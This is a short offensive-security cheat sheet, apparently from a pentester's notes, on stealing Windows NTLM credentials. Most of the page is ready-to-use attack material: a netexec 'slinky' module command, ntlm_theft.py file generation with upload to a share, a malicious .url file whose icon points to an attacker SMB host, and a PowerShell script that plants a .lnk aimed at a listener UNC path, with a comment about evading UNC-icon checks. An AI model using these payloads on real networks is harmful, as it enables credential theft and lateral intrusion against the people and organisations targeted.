Steal NTLM

Triggers implicit SMB authentication and leaks a NetNTLMv2.

nxc

netexec smb <IP> -u <USER> -p <PASS> -M slinky -o NAME=evil SHARE=<NAME_SHARE> SERVER=<MyIP>

python3 ntlm_theft.py -g all -s <IP> -f evil
# insmbclient
prompt off
mput evil/*

.url

evil.url
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0

.lnk

$lnk = "$env:USERPROFILE\Desktop\evil.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\<IP>\share\payload.exe"  # LISTENER SERVER
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()

.library-ms ZIP

ZIP and deliver the file below


https://book.hacktricks.wiki/en/windows-hardening/ntlm/places-to-steal-ntlm-creds.htmlarrow-up-right

Last updated